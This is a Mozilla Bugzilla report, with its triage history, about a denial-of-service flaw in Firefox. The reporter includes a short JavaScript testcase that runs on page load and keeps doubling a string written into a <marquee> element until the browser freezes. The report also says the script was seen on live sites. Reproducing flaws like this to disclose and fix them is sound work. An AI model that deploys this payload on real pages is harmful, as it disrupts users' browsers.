Open Bug 620492 Opened 14 years ago Updated 2 years ago

DoS with long string in <marquee>

Categories

(Core :: DOM: Core & HTML, defect, P5)

Tracking Status
blocking2.0 --- -
status2.0 --- wanted
status1.9.2 --- ?
status1.9.1 --- ?
firefox-esr78 --- affected
firefox85 --- affected
firefox86 --- affected
firefox87 --- affected

People

(Reporter: c750299, Unassigned)

Details

(Keywords: testcase, Whiteboard: [sg:dos])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Build Identifier: 

This script can shut down browsers.
It was seen in the wild, yesterday, on multiple sites.

<html>
<head/><body onload="javascript:DoS();"></body>
<script> 
function DoS() {
var buffer = '\x42';
for (i =0;i<666;i++) {
buffer+=buffer+'\x42';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
</html>


Reproducible: Always




Maybe the browser can detect this and not stop working?
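
The growth of the testcase above, modelled as an added example (not part of the original report or of Mozilla's code): it counts the characters the loop would pass to document.write() without allocating them. The function names and the character budget are assumptions made for illustration.

```javascript
// Added model of the testcase's growth; nothing here builds the real strings.
const PREFIX_LEN = BigInt('<html><marquee><h1>'.length); // 19, from the testcase

// Length of `buffer` after k passes of `buffer += buffer + '\x42'`,
// starting from the one-character string: L(k) = 2 * L(k-1) + 1.
function bufferLength(k) {
  let len = 1n;
  for (let i = 0; i < k; i++) len = 2n * len + 1n;
  return len;
}

// Characters handed to document.write() on 0-based pass i:
// the markup prefix plus two copies of the freshly doubled buffer.
function writeLength(i) {
  return PREFIX_LEN + 2n * bufferLength(i + 1);
}

// First 0-based pass at which the running total passed to document.write()
// exceeds budgetChars (hypothetical budget, counted in UTF-16 code units).
// Returns -1 if the loop bound is reached first.
function firstPassExceeding(budgetChars, maxPasses = 666) {
  let total = 0n;
  for (let i = 0; i < maxPasses; i++) {
    total += writeLength(i);
    if (total > budgetChars) return i;
  }
  return -1;
}
```

For a hypothetical budget of 2^30 characters, `firstPassExceeding(2n ** 30n)` returns 26, so the requested size crosses that budget long before the 666-pass loop bound is reached.
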
Group: core-security
Component: General → DOM
Product: Firefox → Core
QA Contact: general → general
Summary: Denial-of-Service script → DoS with long string in <marquee>
Whiteboard: [sg:dos]
Affecting 3.5, 3.6 and trunk.
Status: UNCONFIRMED → NEW
blocking2.0: --- → ?
status1.9.1: --- → ?
status1.9.2: --- → ?
status2.0: --- → ?
Ever confirmed: true
Version: unspecified → Trunk
Keywords: testcase
Severity: normal → critical
blocking2.0: ? → -
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and have no one currently assigned to P5.

If you have questions, please contact :mdaly.
Priority: -- → P5
Component: DOM → DOM: Core & HTML

This bug is also reproducible on Windows 10 64-bit and affects:
Firefox Release 85
Firefox ESR 78.7.0
Nightly 87.0a1
Beta 86.0b4

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: critical → --
Severity: -- → S3